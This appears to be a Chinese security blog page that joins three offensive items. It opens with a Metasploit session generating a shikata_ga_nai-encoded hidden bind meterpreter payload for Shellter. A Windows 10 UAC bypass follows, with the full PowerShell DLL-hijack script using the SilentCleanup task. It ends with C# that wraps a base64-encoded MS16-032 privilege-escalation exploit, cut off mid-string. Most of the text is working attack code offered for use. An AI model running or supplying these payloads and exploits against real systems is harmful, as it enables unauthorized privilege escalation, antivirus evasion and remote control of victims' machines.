Shellter Custom payload

msf > show payloads
msf > use windows/meterpreter/bind_hidden_ipknock_tcp
msf payload(bind_hidden_ipknock_tcp) > show options
 
Module options (payload/windows/meterpreter/bind_hidden_ipknock_tcp):
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique (Accepted: , , seh, thread, process, none)
KHOST                      yes       IP address allowed
LPORT     4444             yes       The listen port
RHOST                      no        The target address
msf payload(bind_hidden_ipknock_tcp) > set EXITFUNC thread
msf payload(bind_hidden_ipknock_tcp) > set KHOST 8.8.8.8
msf payload(bind_hidden_ipknock_tcp) > set LPORT 5555
msf payload(bind_hidden_ipknock_tcp) > generate -E -e x86/shikata_ga_nai -t raw -f custom_payload
[*] Writing 386 bytes to custom_payload...

BypassUac On Win10 Using Disk Cleanup

最近看到enigma0x3博客上分享了一种通过Disk Cleanup计划任务进行bypassuac的姿势,感觉还是不错的,所以在这儿分享一下。原文在这里 戳我
关于BypassUAC工具已经很多了,有个非常不错的工具 UACME

简单的说一下通过Disk Cleanup进行bypassuac的原理。

Win10有一个计划任务叫做SilentCleanup,具体位置在\Microsoft\Windows\DiskCleanup

1.png

从图中可以看出,这个计划任务是会使用最高权限运行程序的,而加载此计划任务不需要最高权限。

此任务执行会运行cleanmgr.exe,而且会创建一个新的文件夹“C:\Users\<username>\AppData\Local\Temp\<GUID>” 并将dismhost.exe以及其使用的相关DLL文件复制到这个文件夹下面。

lala.png

当dismhost.exe运行时,会加载其要使用的DLL文件,由于当前目录是在%TEMP%,所以完全可以进行DLL劫持,测试发现LogProvider.dll是最后一个加载的DLL,可以被我们利用,所以只需要把这个DLL替换成我们的恶意DLL,那么这个计划任务运行的时候,我们的DLL就会被加载,达到BypassUAC的目的。为了能马上进行BypassUAC,可以使用WMI来运行这个计划任务。作者已经给出了利用脚本,链接 BypassUAC , 测试DLL链接:MessageBox

有兴趣的测测看吧~

作者代码被墙了,贴在了下面:

function Invoke-UACBypass {
<#
.SYNOPSIS

Bypasses UAC on Windows 10 by abusing the SilentCleanup task to win a race condition, allowing for a DLL hijack without a privileged file copy.

Author: Matthew Graeber (@mattifestation), Matt Nelson (@enigma0x3)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None

.PARAMETER DllPath

Specifies the path to the DLL you want executed in a high integrity context. Be mindful of the architecture of the DLL. It must match that of %SystemRoot%\System32\Dism\LogProvider.dll.

.EXAMPLE

Invoke-UACBypass -DllPath C:\Users\TestUser\Desktop\Win10UACBypass\PrivescTest.dll

.EXAMPLE

Invoke-UACBypass -DllPath C:\Users\TestUser\Desktop\TotallyLegit.txt -Verbose

The DllPath can have any extension as long as the file itself is a DLL.
#>

    [CmdletBinding()]
    [OutputType([System.IO.FileInfo])]
    Param (
        [Parameter(Mandatory = $True)]
        [String]
        [ValidateScript({ Test-Path $_ })]
        $DllPath
    )

    $PrivescAction = {
        $ReplacementDllPath = $Event.MessageData.DllPath
        # The newly created GUID folder
        $DismHostFolder = $EventArgs.NewEvent.TargetInstance.Name
        
        $OriginalPreference = $VerbosePreference

        # Force -Verbose to display in the event
        if ($Event.MessageData.VerboseSet -eq $True) {
            $VerbosePreference = 'Continue'
        }

        Write-Verbose "DismHost folder created in $DismHostFolder"
        Write-Verbose "$ReplacementDllPath to $DismHostFolder\LogProvider.dll"
            
        try {
            $FileInfo = Copy-Item -Path $ReplacementDllPath -Destination "$DismHostFolder\LogProvider.dll" -Force -PassThru -ErrorAction Stop
        } catch {
            Write-Warning "Error copying file! Message: $_"
        }

        # Restore the event preference
        $VerbosePreference = $OriginalPreference

        if ($FileInfo) {
            # Trigger Wait-Event to return and indicate success.
            New-Event -SourceIdentifier 'DllPlantedSuccess' -MessageData $FileInfo
        }
    }

    $VerboseSet = $False
    if ($PSBoundParameters['Verbose']) { $VerboseSet = $True }

    $MessageData = New-Object -TypeName PSObject -Property @{
        DllPath = $DllPath
        VerboseSet = $VerboseSet # Pass the verbose preference to the scriptblock since
                                 # event scriptblocks will not automatically honor -Verbose.
    }

    $TempDrive = $Env:TEMP.Substring(0,2)

    # Trigger the DLL dropper with the following conditions:
    #  1) A directory is created - i.e. new Win32_Directory instance
    #  2) The directory created is created under %TEMP%
    #  3) The directory name is in the form of a GUID
    $TempFolderCreationEvent = "SELECT * FROM __InstanceCreationEvent WITHIN 1 WHERE TargetInstance ISA `"Win32_Directory`" AND TargetInstance.Drive = `"$TempDrive`" AND TargetInstance.Path = `"$($Env:TEMP.Substring(2).Replace('\', '\\'))\\`" AND TargetInstance.FileName LIKE `"________-____-____-____-____________`""
    
    $TempFolderWatcher = Register-WmiEvent -Query $TempFolderCreationEvent -Action $PrivescAction -MessageData $MessageData

    # We need to jump through these hoops to properly capture stdout and stderr of schtasks.
    $StartInfo = New-Object Diagnostics.ProcessStartInfo
    $StartInfo.FileName = 'schtasks'
    $StartInfo.Arguments = '/Run /TN "\Microsoft\Windows\DiskCleanup\SilentCleanup" /I'
    $StartInfo.RedirectStandardError = $True
    $StartInfo.RedirectStandardOutput = $True
    $StartInfo.UseShellExecute = $False
    $Process = New-Object Diagnostics.Process
    $Process.StartInfo = $StartInfo
    $null = $Process.Start()
    $Process.WaitForExit()
    $Stdout = $Process.StandardOutput.ReadToEnd().Trim()
    $Stderr = $Process.StandardError.ReadToEnd().Trim()

    if ($Stderr) {
        Unregister-Event -SubscriptionId $TempFolderWatcher.Id
        throw "SilentCleanup task failed to execute. Error message: $Stderr"
    } else {
        if ($Stdout.Contains('is currently running')) {
            Unregister-Event -SubscriptionId $TempFolderWatcher.Id
            Write-Warning 'SilentCleanup task is already running. Please wait until the task has completed.'
        }

        Write-Verbose "SilentCleanup task executed successfully. Message: $Stdout"
    }

    $PayloadExecutedEvent = Wait-Event -SourceIdentifier 'DllPlantedSuccess' -Timeout 10

    Unregister-Event -SubscriptionId $TempFolderWatcher.Id

    if ($PayloadExecutedEvent) {
        Write-Verbose 'UAC bypass was successful!'

        # Output the file info for the DLL that was planted
        $PayloadExecutedEvent.MessageData

        $PayloadExecutedEvent | Remove-Event
    } else {
        # The event timed out.
        Write-Error 'UAC bypass failed. The DLL was not planted in its target.'
    }
}

编译你的Powershell( MS16-032为例)

授人以鱼不如授人以渔

之前的MS16-032是个powershell脚本,怎么样改成exe呢,很简单。使用.net直接简单的修改编译就可以了。已经改好的代码在这里:

戳我

gist貌似被墙了,我在这里也贴一下:

/*
Author: Evilcg, Twitter: @Evilcg
Step One:
PS C:\> [psobject].Assembly.Location
C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll
Step Two:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  /reference:"C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /out:MS16_032.exe MS16_032.cs
*/

// Windows 10 reference may be Here: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35
using System;
using System.IO;
using System.Collections.Generic;
using System.Collections.ObjectModel;
using System.Text;
using System.Threading.Tasks;
using System.Management.Automation;
using System.Management.Automation.Host;
using System.Management.Automation.Runspaces;

namespace ConsoleApplication1
{
    class Program
    {
        static string _application;
        static string _commandline;
        static int Main(string[] args)
        {
             if (args.Length == 0)
            {
                System.Console.WriteLine("Usage: MS16_032.exe calc.exe OR MS16_032.exe cmd.exe \"/c clac.exe\"");
                return 1;
            }
             else if (args.Length ==1)
            {

                _application = args[0];         
                PowerShellExecutor t = new PowerShellExecutor();
                t.ExecuteSynchronously(_application, "");
            }
            else if(args.Length == 2)
            {
                _application = args[0];
                _commandline = args[1];
                PowerShellExecutor t = new PowerShellExecutor();
                t.ExecuteSynchronously(_application, _commandline);
            }
            return 0;
            
        }
    }

    class PowerShellExecutor
    {
        public static string PSInvoke_MS16_032 = System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String(@"ZnVuY3Rpb24gSW52b2tlLU1TMTYtMDMyIHsKPCMKLlNZTk9QU0lTCiAgICAKICAgIFBvd2VyU2hlbGwgaW1wbGVtZW50YXRpb24gb2YgTVMxNi0wMzIuIFRoZSBleHBsb2l0IHRhcmdldHMgYWxsIHZ1bG5lcmFibGUKICAgIG9wZXJhdGluZyBzeXN0ZW1zIHRoYXQgc3VwcG9ydCBQb3dlclNoZWxsIHYyKy4gQ3JlZGl0IGZvciB0aGUgZGlzY292ZXJ5IG9mCiAgICB0aGUgYnVnIGFuZCB0aGUgbG9naWMgdG8gZXhwbG9pdCBpdCBnbyB0byBKYW1lcyBGb3JzaGF3IChAdGlyYW5pZGRvKS4KICAgIAogICAgVGFyZ2V0czoKICAgIAogICAgKiBXaW43LVdpbjEwICYgMms4LTJrMTIgPD09IDMyLzY0IGJpdCEKICAgICogVGVzdGVkIG9uIHgzMiBXaW43LCB4NjQgV2luOCwgeDY0IDJrMTJSMgogICAgCiAgICBOb3RlczoKICAgIAogICAgKiBJbiBvcmRlciBmb3IgdGhlIHJhY2UgY29uZGl0aW9uIHRvIHN1Y2NlZWQgdGhlIG1hY2hpbmUgbXVzdCBoYXZlIDIrIENQVQogICAgICBjb3Jlcy4gSWYgdGVzdGluZyBpbiBhIFZNIGp1c3QgbWFrZSBzdXJlIHRvIGFkZCBhIGNvcmUgaWYgbmVlZGVkIG1rYXkuCiAgICAqIFRoZSBleHBsb2l0IGlzIHByZXR0eSByZWxpYWJsZSwgaG93ZXZlciB+MS82IHRpbWVzIGl0IHdpbGwgc2F5IGl0IHN1Y2NlZWRlZAogICAgICBidXQgbm90IHNwYXduIGEgc2hlbGwuIE5vdCBzdXJlIHdoYXQgdGhlIGlzc3VlIGlzIGJ1dCBqdXN0IHJlLXJ1biBhbmQgcHJvZml0IQogICAgKiBXYW50IHRvIGtub3cgbW9yZSBhYm91dCBNUzE2LTAzMiA9PT4KICAgICAgaHR0cHM6Ly9nb29nbGVwcm9qZWN0emVyby5ibG9nc3BvdC5jby51ay8yMDE2LzAzL2V4cGxvaXRpbmctbGVha2VkLXRocmVhZC1oYW5kbGUuaHRtbAoKLkRFU0NSSVBUSU9OCiAgICBBdXRob3I6IFJ1YmVuIEJvb25lbiAoQEZ1enp5U2VjKQogICAgQmxvZzogaHR0cDovL3d3dy5mdXp6eXNlY3VyaXR5LmNvbS8KICAgIExpY2Vuc2U6IEJTRCAzLUNsYXVzZQogICAgUmVxdWlyZWQgRGVwZW5kZW5jaWVzOiBQb3dlclNoZWxsIHYyKwogICAgT3B0aW9uYWwgRGVwZW5kZW5jaWVzOiBOb25lCgouUEFSQU1FVEVSIEFwcGxpY2F0aW9uCgpTcGVjaWZpZXMgYW4gQXBwbGljYXRpb24gdG8gcnVuLgoKLlBBUkFNRVRFUiBDb21tYW5kbGluZQoKU3BlY2lmaWVzIENvbW1hbmRsaW5lLCBzdWNoIGFzIG5ldCB1c2VyIHh4eCB4eHggL2FkZAogICAgCi5FWEFNUExFCiAgICBDOlxQUz4gSW52b2tlLU1TMTYtMDMyIC1BcHBsaWNhdGlvbiBDOlxXaW5kb3dzXFN5c3RlbTMyXGNtZC5leGUKICAgIEM6XFBTPiBJbnZva2UtTVMxNi0wMzIgLUFwcGxpY2F0aW9uIEM6XFdpbmRvd3NcU3lzdGVtMzJcY21kLmV4ZSAtQ29tbWFuZGxpbmUgIi9jIG5ldCB1c2VyIDEgMSAvYWRkIgoKIz4KICBbQ21kbGV0QmluZGluZygpXQogICAgcGFyYW0oCiAgICAgICAgW1BhcmFtZXRlcihNYW5kYXRvcnkgPSAkRmFsc2UsIFBhcmFtZXRlclNldE5hbWUgPSAnQzpcV2luZG93c1xTeXN0ZW0zMlxjbWQuZXhlJyApXQogICAgICAgIFtzdHJpbmddCiAgICAgICAgJEFwcGxpY2F0aW9uLAoKICAgICAgICBbUGFyYW1ldGVyKE1hbmRhdG9yeSA9ICRGYWxzZSldCiAgICAgICAgW3N0cmluZ10KICAgICAgICAkQ29tbWFuZGxpbmUKICAgICAgICApCgoKICAgIEFkZC1UeXBlIC1UeXBlRGVmaW5pdGlvbiBAIgogICAgdXNpbmcgU3lzdGVtOwogICAgdXNpbmcgU3lzdGVtLkRpYWdub3N0aWNzOwogICAgdXNpbmcgU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzOwogICAgdXNpbmcgU3lzdGVtLlNlY3VyaXR5LlByaW5jaXBhbDsKICAgIAogICAgW1N0cnVjdExheW91dChMYXlvdXRLaW5kLlNlcXVlbnRpYWwpXQogICAgcHVibGljIHN0cnVjdCBQUk9DRVNTX0lORk9STUFUSU9OCiAgICB7CiAgICAgICAgcHVibGljIEludFB0ciBoUHJvY2VzczsKICAgICAgICBwdWJsaWMgSW50UHRyIGhUaHJlYWQ7CiAgICAgICAgcHVibGljIGludCBkd1Byb2Nlc3NJZDsKICAgICAgICBwdWJsaWMgaW50IGR3VGhyZWFkSWQ7CiAgICB9CiAgICAKICAgIFtTdHJ1Y3RMYXlvdXQoTGF5b3V0S2luZC5TZXF1ZW50aWFsLCBDaGFyU2V0PUNoYXJTZXQuVW5pY29kZSldCiAgICBwdWJsaWMgc3RydWN0IFNUQVJUVVBJTkZPCiAgICB7CiAgICAgICAgcHVibGljIEludDMyIGNiOwogICAgICAgIHB1YmxpYyBzdHJpbmcgbHBSZXNlcnZlZDsKICAgICAgICBwdWJsaWMgc3RyaW5nIGxwRGVza3RvcDsKICAgICAgICBwdWJsaWMgc3RyaW5nIGxwVGl0bGU7CiAgICAgICAgcHVibGljIEludDMyIGR3WDsKICAgICAgICBwdWJsaWMgSW50MzIgZHdZOwogICAgICAgIHB1YmxpYyBJbnQzMiBkd1hTaXplOwogICAgICAgIHB1YmxpYyBJbnQzMiBkd1lTaXplOwogICAgICAgIHB1YmxpYyBJbnQzMiBkd1hDb3VudENoYXJzOwogICAgICAgIHB1YmxpYyBJbnQzMiBkd1lDb3VudENoYXJzOwogICAgICAgIHB1YmxpYyBJbnQzMiBkd0ZpbGxBdHRyaWJ1dGU7CiAgICAgICAgcHVibGljIEludDMyIGR3RmxhZ3M7CiAgICAgICAgcHVibGljIEludDE2IHdTaG93V2luZG93OwogICAgICAgIHB1YmxpYyBJbnQxNiBjYlJlc2VydmVkMjsKICAgICAgICBwdWJsaWMgSW50UHRyIGxwUmVzZXJ2ZWQyOwogICAgICAgIHB1YmxpYyBJbnRQdHIgaFN0ZElucHV0OwogICAgICAgIHB1YmxpYyBJbnRQdHIgaFN0ZE91dHB1dDsKICAgICAgICBwdWJsaWMgSW50UHRyIGhTdGRFcnJvcjsKICAgIH0KICAgIAogICAgW1N0cnVjdExheW91dChMYXlvdXRLaW5kLlNlcXVlbnRpYWwpXQogICAgcHVibGljIHN0cnVjdCBTUU9TCiAgICB7CiAgICAgICAgcHVibGljIGludCBMZW5ndGg7CiAgICAgICAgcHVibGljIGludCBJbXBlcnNvbmF0aW9uTGV2ZWw7CiAgICAgICAgcHVibGljIGludCBDb250ZXh0VHJhY2tpbmdNb2RlOwogICAgICAgIHB1YmxpYyBib29sIEVmZmVjdGl2ZU9ubHk7CiAgICB9CiAgICAKICAgIHB1YmxpYyBzdGF0aWMgY2xhc3MgQWR2YXBpMzIKICAgIHsKICAgICAgICBbRGxsSW1wb3J0KCJhZHZhcGkzMi5kbGwiLCBTZXRMYXN0RXJyb3I9dHJ1ZSwgQ2hhclNldD1DaGFyU2V0LlVuaWNvZGUpXQogICAgICAgIHB1YmxpYyBzdGF0aWMgZXh0ZXJuIGJvb2wgQ3JlYXRlUHJvY2Vzc1dpdGhMb2dvblcoCiAgICAgICAgICAgIFN0cmluZyB1c2VyTmFtZSwKICAgICAgICAgICAgU3RyaW5nIGRvbWFpbiwKICAgICAgICAgICAgU3RyaW5nIHBhc3N3b3JkLAogICAgICAgICAgICBpbnQgbG9nb25GbGFncywKICAgICAgICAgICAgU3RyaW5nIGFwcGxpY2F0aW9uTmFtZSwKICAgICAgICAgICAgU3RyaW5nIGNvbW1hbmRMaW5lLAogICAgICAgICAgICBpbnQgY3JlYXRpb25GbGFncywKICAgICAgICAgICAgaW50IGVudmlyb25tZW50LAogICAgICAgICAgICBTdHJpbmcgY3VycmVudERpcmVjdG9yeSwKICAgICAgICAgICAgcmVmICBTVEFSVFVQSU5GTyBzdGFydHVwSW5mbywKICAgICAgICAgICAgb3V0IFBST0NFU1NfSU5GT1JNQVRJT04gcHJvY2Vzc0luZm9ybWF0aW9uKTsKICAgICAgICAgICAgCiAgICAgICAgW0RsbEltcG9ydCgiYWR2YXBpMzIuZGxsIiwgU2V0TGFzdEVycm9yPXRydWUpXQogICAgICAgIHB1YmxpYyBzdGF0aWMgZXh0ZXJuIGJvb2wgU2V0VGhyZWFkVG9rZW4oCiAgICAgICAgICAgIHJlZiBJbnRQdHIgVGhyZWFkLAogICAgICAgICAgICBJbnRQdHIgVG9rZW4pOwogICAgICAgICAgICAKICAgICAgICBbRGxsSW1wb3J0KCJhZHZhcGkzMi5kbGwiLCBTZXRMYXN0RXJyb3I9dHJ1ZSldCiAgICAgICAgcHVibGljIHN0YXRpYyBleHRlcm4gYm9vbCBPcGVuVGhyZWFkVG9rZW4oCiAgICAgICAgICAgIEludFB0ciBUaHJlYWRIYW5kbGUsCiAgICAgICAgICAgIGludCBEZXNpcmVkQWNjZXNzLAogICAgICAgICAgICBib29sIE9wZW5Bc1NlbGYsCiAgICAgICAgICAgIG91dCBJbnRQdHIgVG9rZW5IYW5kbGUpOwogICAgICAgICAgICAKICAgICAgICBbRGxsSW1wb3J0KCJhZHZhcGkzMi5kbGwiLCBTZXRMYXN0RXJyb3I9dHJ1ZSldCiAgICAgICAgcHVibGljIHN0YXRpYyBleHRlcm4gYm9vbCBPcGVuUHJvY2Vzc1Rva2VuKAogICAgICAgICAgICBJbnRQdHIgUHJvY2Vzc0hhbmRsZSwgCiAgICAgICAgICAgIGludCBEZXNpcmVkQWNjZXNzLAogICAgICAgICAgICByZWYgSW50UHRyIFRva2VuSGFuZGxlKTsKICAgICAgICAgICAgCiAgICAgICAgW0RsbEltcG9ydCgiYWR2YXBpMzIuZGxsIiwgU2V0TGFzdEVycm9yPXRydWUpXQogICAgICAgIHB1YmxpYyBleHRlcm4gc3RhdGljIGJvb2wgRHVwbGljYXRlVG9rZW4oCiAgICAgICAgICAgIEludFB0ciBFeGlzdGluZ1Rva2VuSGFuZGxlLAogICAgICAgICAgICBpbnQgU0VDVVJJVFlfSU1QRVJTT05BVElPTl9MRVZFTCwKICAgICAgICAgICAgcmVmIEludFB0ciBEdXBsaWNhdGVUb2tlbkhhbmRsZSk7CiAgICB9CiAgICAKICAgIHB1YmxpYyBzdGF0aWMgY2xhc3MgS2VybmVsMzIKICAgIHsKICAgICAgICBbRGxsSW1wb3J0KCJrZXJuZWwzMi5kbGwiKV0KICAgICAgICBwdWJsaWMgc3RhdGljIGV4dGVybiB1aW50IEdldExhc3RFcnJvcigpOwogICAgCiAgICAgICAgW0RsbEltcG9ydCgia2VybmVsMzIuZGxsIiwgU2V0TGFzdEVycm9yPXRydWUpXQogICAgICAgIHB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBHZXRDdXJyZW50UHJvY2VzcygpOwogICAgCiAgICAgICAgW0RsbEltcG9ydCgia2VybmVsMzIuZGxsIiwgU2V0TGFzdEVycm9yPXRydWUpXQogICAgICAgIHB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBHZXRDdXJyZW50VGhyZWFkKCk7CiAgICAgICAgCiAgICAgICAgW0RsbEltcG9ydCgia2VybmVsMzIuZGxsIiwgU2V0TGFzdEVycm9yPXRydWUpXQogICAgICAgIHB1YmxpYyBzdGF0aWMgZXh0ZXJuIGludCBHZXRUaHJlYWRJZChJbnRQdHIgaFRocmVhZCk7CiAgICAgICAgCiAgICAgICAgW0RsbEltcG9ydCgia2VybmVsMzIuZGxsIiwgU2V0TGFzdEVycm9yID0gdHJ1ZSldCiAgICAgICAgcHVibGljIHN0YXRpYyBleHRlcm4gaW50IEdldFByb2Nlc3NJZE9mVGhyZWFkKEludFB0ciBoYW5kbGUpOwogICAgICAgIAogICAgICAgIFtEbGxJbXBvcnQoImtlcm5lbDMyLmRsbCIsU2V0TGFzdEVycm9yPXRydWUpXQogICAgICAgIHB1YmxpYyBzdGF0aWMgZXh0ZXJuIGludCBTdXNwZW5kVGhyZWFkKEludFB0ciBoVGhyZWFkKTsKICAgICAgICAKICAgICAgICBbRGxsSW1wb3J0KCJrZXJuZWwzMi5kbGwiLFNldExhc3RFcnJvcj10cnVlKV0KICAgICAgICBwdWJsaWMgc3RhdGljIGV4dGVybiBpbnQgUmVzdW1lVGhyZWFkKEludFB0ciBoVGhyZWFkKTsKICAgICAgICAKICAgICAgICBbRGxsSW1wb3J0KCJrZXJuZWwzMi5kbGwiLCBTZXRMYXN0RXJyb3I9dHJ1ZSldCiAgICAgICAgcHVibGljIHN0YXRpYyBleHRlcm4gYm9vbCBUZXJtaW5hdGVQcm9jZXNzKAogICAgICAgICAgICBJbnRQdHIgaFByb2Nlc3MsCiAgICAgICAgICAgIHVpbnQgdUV4aXRDb2RlKTsKICAgIAogICAgICAgIFtEbGxJbXBvcnQoImtlcm5lbDMyLmRsbCIsIFNldExhc3RFcnJvcj10cnVlKV0KICAgICAgICBwdWJsaWMgc3RhdGljIGV4dGVybiBib29sIENsb3NlSGFuZGxlKEludFB0ciBoT2JqZWN0KTsKICAgICAgICAKICAgICAgICBbRGxsSW1wb3J0KCJrZXJuZWwzMi5kbGwiLCBTZXRMYXN0RXJyb3I9dHJ1ZSldCiAgICAgICAgcHVibGljIHN0YXRpYyBleHRlcm4gYm9vbCBEdXBsaWNhdGVIYW5kbGUoCiAgICAgICAgICAgIEludFB0ciBoU291cmNlUHJvY2Vzc0hhbmRsZSwKICAgICAgICAgICAgSW50UHRyIGhTb3VyY2VIYW5kbGUsCiAgICAgICAgICAgIEludFB0ciBoVGFyZ2V0UHJvY2Vzc0hhbmRsZSwKICAgICAgICAgICAgcmVmIEludFB0ciBscFRhcmdldEhhbmRsZSwKICAgICAgICAgICAgaW50IGR3RGVzaXJlZEFjY2VzcywKICAgICAgICAgICAgYm9vbCBiSW5oZXJpdEhhbmRsZSwKICAgICAgICAgICAgaW50IGR3T3B0aW9ucyk7CiAgICB9CiAgICAKICAgIHB1YmxpYyBzdGF0aWMgY2xhc3MgTnRkbGwKICAgIHsKICAgICAgICBbRGxsSW1wb3J0KCJudGRsbC5kbGwiLCBTZXRMYXN0RXJyb3I9dHJ1ZSldCiAgICAgICAgcHVibGljIHN0YXRpYyBleHRlcm4gaW50IE50SW1wZXJzb25hdGVUaHJlYWQoCiAgICAgICAgICAgIEludFB0ciBUaHJlYWRIYW5kbGUsCiAgICAgICAgICAgIEludFB0ciBUaHJlYWRUb0ltcGVyc29uYXRlLAogICAgICAgICAgICByZWYgU1FPUyBTZWN1cml0eVF1YWxpdHlPZlNlcnZpY2UpOwogICAgfQoiQAoKICAgIGZ1bmN0aW9uIEdldC1UaHJlYWRIYW5kbGUgewogICAgICAgICMgU3RhcnR1cEluZm8gU3RydWN0CiAgICAgICAgJFN0YXJ0dXBJbmZvID0gTmV3LU9iamVjdCBTVEFSVFVQSU5GTwogICAgICAgICRTdGFydHVwSW5mby5kd0ZsYWdzID0gMHgwMDAwMDEwMSAjIFNUQVJURl9VU0VTVERIQU5ETEVTCiAgICAgICAgICAgICRTdGFydHVwSW5mby53U2hvd1dpbmRvdyA9IDA7CiAgICAgICAgJFN0YXJ0dXBJbmZvLmhTdGRJbnB1dCA9IFtLZXJuZWwzMl06OkdldEN1cnJlbnRUaHJlYWQoKQogICAgICAgICRTdGFydHVwSW5mby5oU3RkT3V0cHV0ID0gW0tlcm5lbDMyXTo6R2V0Q3VycmVudFRocmVhZCgpCiAgICAgICAgJFN0YXJ0dXBJbmZvLmhTdGRFcnJvciA9IFtLZXJuZWwzMl06OkdldEN1cnJlbnRUaHJlYWQoKQogICAgICAgICRTdGFydHVwSW5mby5jYiA9IFtTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMuTWFyc2hhbF06OlNpemVPZigkU3RhcnR1cEluZm8pICMgU3RydWN0IFNpemUKICAgICAgICAKICAgICAgICAjIFByb2Nlc3NJbmZvIFN0cnVjdAogICAgICAgICRQcm9jZXNzSW5mbyA9IE5ldy1PYmplY3QgUFJPQ0VTU19JTkZPUk1BVElPTgogICAgICAgIAogICAgICAgICMgQ3JlYXRlUHJvY2Vzc1dpdGhMb2dvblcgLS0+IGxwQ3VycmVudERpcmVjdG9yeQogICAgICAgICRHZXRDdXJyZW50UGF0aCA9IChHZXQtSXRlbSAtUGF0aCAiLlwiIC1WZXJib3NlKS5GdWxsTmFtZQogICAgICAgIAogICAgICAgICMgTE9HT05fTkVUQ1JFREVOVElBTFNfT05MWSAvIENSRUFURV9TVVNQRU5ERUQKICAgICAgICAkQ2FsbFJlc3VsdCA9IFtBZHZhcGkzMl06OkNyZWF0ZVByb2Nlc3NXaXRoTG9nb25XKAogICAgICAgICAgICAidXNlciIsICJkb21haW4iLCAicGFzcyIsCiAgICAgICAgICAgIDB4MDAwMDAwMDIsICJDOlxXaW5kb3dzXFN5c3RlbTMyXG5vdGVwYWQuZXhlIiwgIiIsCiAgICAgICAgICAgIDB4MDAwMDAwMDQsICRudWxsLCAkR2V0Q3VycmVudFBhdGgsCiAgICAgICAgICAgIFtyZWZdJFN0YXJ0dXBJbmZvLCBbcmVmXSRQcm9jZXNzSW5mbykKICAgICAgICAKICAgICAgICAjIER1cGxpY2F0ZSBoYW5kbGUgaW50byBjdXJyZW50IHByb2Nlc3MgLT4gRFVQTElDQVRFX1NBTUVfQUNDRVNTCiAgICAgICAgJGxwVGFyZ2V0SGFuZGxlID0gW0ludFB0cl06Olplcm8KICAgICAgICAkQ2FsbFJlc3VsdCA9IFtLZXJuZWwzMl06OkR1cGxpY2F0ZUhhbmRsZSgKICAgICAgICAgICAgJFByb2Nlc3NJbmZvLmhQcm9jZXNzLCAweDQsCiAgICAgICAgICAgIFtLZXJuZWwzMl06OkdldEN1cnJlbnRQcm9jZXNzKCksCiAgICAgICAgICAgIFtyZWZdJGxwVGFyZ2V0SGFuZGxlLCAwLCAkZmFsc2UsCiAgICAgICAgICAgIDB4MDAwMDAwMDIpCiAgICAgICAgCiAgICAgICAgIyBDbGVhbiB1cCBzdXNwZW5kZWQgcHJvY2VzcwogICAgICAgICRDYWxsUmVzdWx0ID0gW0tlcm5lbDMyXTo6VGVybWluYXRlUHJvY2VzcygkUHJvY2Vzc0luZm8uaFByb2Nlc3MsIDEpCiAgICAgICAgJENhbGxSZXN1bHQgPSBbS2VybmVsMzJdOjpDbG9zZUhhbmRsZSgkUHJvY2Vzc0luZm8uaFByb2Nlc3MpCiAgICAgICAgJENhbGxSZXN1bHQgPSBbS2VybmVsMzJdOjpDbG9zZUhhbmRsZSgkUHJvY2Vzc0luZm8uaFRocmVhZCkKICAgICAgICAKICAgICAgICAkbHBUYXJnZXRIYW5kbGUKICAgIH0KICAgIAogICAgZnVuY3Rpb24gR2V0LVN5c3RlbVRva2VuIHsKICAgICAgICBlY2hvICJgbls/XSBUcnlpbmcgdGhyZWFkIGhhbmRsZTogJFRocmVhZCIKICAgICAgICBlY2hvICJbP10gVGhyZWFkIGJlbG9uZ3MgdG86ICQoJChHZXQtUHJvY2VzcyAtUElEICQoW0tlcm5lbDMyXTo6R2V0UHJvY2Vzc0lkT2ZUaHJlYWQoJFRocmVhZCkpKS5Qcm9jZXNzTmFtZSkiCiAgICAKICAgICAgICAkQ2FsbFJlc3VsdCA9IFtLZXJuZWwzMl06OlN1c3BlbmRUaHJlYWQoJFRocmVhZCkKICAgICAgICBpZiAoJENhbGxSZXN1bHQgLW5lIDApIHsKICAgICAgICAgICAgZWNobyAiWyFdICRUaHJlYWQgaXMgYSBiYWQgdGhyZWFkLCBtb3Zpbmcgb24uLiIKICAgICAgICAgICAgUmV0dXJuCiAgICAgICAgfSBlY2hvICJbK10gVGhyZWFkIHN1c3BlbmRlZCIKICAgICAgICAKICAgICAgICBlY2hvICJbPl0gV2lwaW5nIGN1cnJlbnQgaW1wZXJzb25hdGlvbiB0b2tlbiIKICAgICAgICAkQ2FsbFJlc3VsdCA9IFtBZHZhcGkzMl06OlNldFRocmVhZFRva2VuKFtyZWZdJFRocmVhZCwgW0ludFB0cl06Olplcm8pCiAgICAgICAgaWYgKCEkQ2FsbFJlc3VsdCkgewogICAgICAgICAgICBlY2hvICJbIV0gU2V0VGhyZWFkVG9rZW4gZmFpbGVkLCBtb3Zpbmcgb24uLiIKICAgICAgICAgICAgJENhbGxSZXN1bHQgPSBbS2VybmVsMzJdOjpSZXN1bWVUaHJlYWQoJFRocmVhZCkKICAgICAgICAgICAgZWNobyAiWytdIFRocmVhZCByZXN1bWVkISIKICAgICAgICAgICAgUmV0dXJuCiAgICAgICAgfQogICAgICAgIAogICAgICAgIGVjaG8gIls+XSBCdWlsZGluZyBTWVNURU0gaW1wZXJzb25hdGlvbiB0b2tlbiIKICAgICAgICAjIFNlY3VyaXR5UXVhbGl0eU9mU2VydmljZSBzdHJ1Y3QKICAgICAgICAkU1FPUyA9IE5ldy1PYmplY3QgU1FPUwogICAgICAgICRTUU9TLkltcGVyc29uYXRpb25MZXZlbCA9IDIgI1NlY3VyaXR5SW1wZXJzb25hdGlvbgogICAgICAgICRTUU9TLkxlbmd0aCA9IFtTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMuTWFyc2hhbF06OlNpemVPZigkU1FPUykKICAgICAgICAjIFVuZG9jdW1lbnRlZCBBUEkncywgSSBsaWtlIHlvdXIgc3R5bGUgTWl